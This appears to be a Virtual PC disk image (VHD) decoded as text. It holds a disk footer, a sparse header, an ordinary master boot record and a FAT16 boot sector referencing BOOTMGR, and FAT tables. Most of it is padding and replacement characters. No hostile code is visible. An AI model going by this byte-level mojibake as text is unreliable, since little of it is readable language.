conectix             + ��win  
  Wi2k              �   ���D�3��&7�@��<�<U�                                                                                                                                                                                                                                                                                                                                                                                                                                            cxsparse��������             @    ���7                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������3��м |���ؾ |� � ��Ph��� ���~  |�������V U�F�F �A��U�]r��U�u	�� t�Ff`�~ t&fh    f�vh  h |h h �B�V ���������� |�V �v�N�n�fas�Nu�~ ��� ���U2�V �]랁>�}U�un�v � u����d� ���`�| ���d�u �� ��f#�u;f��TCPAu2��r,fh�  fh   fh   fSfSfUfh    fh |  fah  �Z2�� |  ���������2� ��< t	� �������+��d� $��$�Invalid partition table Error loading operating system Missing operating system   c{�����    �?�   ��                                                 U�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                �<�MSDOS5.0     �� ? � �   �� � )v׸�NO NAME    FAT16   3ɎѼ�{�ٸ  ���� |8N$}$����<r��:f�|&f;&�W�u���V��s�3ɊF��fFVFыv`�F��V��  ��^�H��F�N�a�  �� r9&8-t`���}�at2Nt	�� ;�r��ܠ�}�}��@tHt�� ����}���}����&�UR��  �; r�[�V$�|���F�=}�F�)}�ىN�N���}��   ��f�F�fFf��f���^��JJ�F2���F�V��JRPSjj��F��3������B���v�����
̸�~u�B��V$�aar@uB^Iu��A�  `fj �BOOTMGR    
Remove disks or other media.�
Disk error�
Press any key to restart
       ���U�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ������������  	 
                        ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ��_ ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~  � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~����������������������������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ������������  	 
                        ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ��_ ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~  � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �  	
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~����������������������������������������������������                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           